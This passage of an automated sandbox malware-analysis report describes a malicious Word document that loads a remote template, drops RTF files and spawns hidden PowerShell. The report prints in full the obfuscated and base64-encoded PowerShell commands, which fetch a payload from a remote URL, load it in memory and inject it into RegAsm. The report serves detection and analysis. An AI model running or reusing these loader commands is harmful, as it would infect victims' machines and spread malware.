                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE summary lastprinted = 2024-07-15 15:30:47
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE indicators vbamacros = False

                Data Obfuscation

                barindex
                Obfuscated command line found
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"Jump to behavior
                Suspicious powershell command line found
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041CBE1
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_00548F51 push eax; retf 8_2_00548F61
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_00544940 push 80000000h; iretd 8_2_00544948
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_00555B15 push ss; retf 8_2_00555B16
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_00540003 push 80000000h; iretd 8_2_00540008
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0053FFDB push 80000000h; retf 0000h8_2_0053FFE0
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005401F4 push eax; retf 8_2_005401F5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005567BF push esi; ret 8_2_005567EB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005456A4 pushad ; retn 0054h8_2_005456A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00457186 push ecx; ret 13_2_00457199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0045E55D push esi; ret 13_2_0045E566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00457AA8 push eax; ret 13_2_00457AC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434EB6 push ecx; ret 13_2_00434EC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10002806 push ecx; ret 13_2_10002819
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044693D push ecx; ret 15_2_0044694D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00451D54 push eax; ret 15_2_00451D61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00451D34 push eax; ret 16_2_00451D41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414060 push eax; ret 17_2_00414074
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414060 push eax; ret 17_2_0041409C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414039 push ecx; ret 17_2_00414049
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4

                Persistence and Installation Behavior

                barindex
                Microsoft Office launches external ms-search protocol handler (WebDAV)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\og1.in@SSL\DavWWWRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\og1.in@SSL\DavWWWRootJump to behavior
                Contains an external reference to another file
                Source: settings.xml.relsExtracted files from sample: https://og1.in/9aubsm
                Office drops RTF file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: F971B2FE.doc.0.drJump to dropped file
                Office viewer loads remote template
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00406EEB ShellExecuteW,URLDownloadToFileW,13_2_00406EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_0041AADB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041CBE1
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
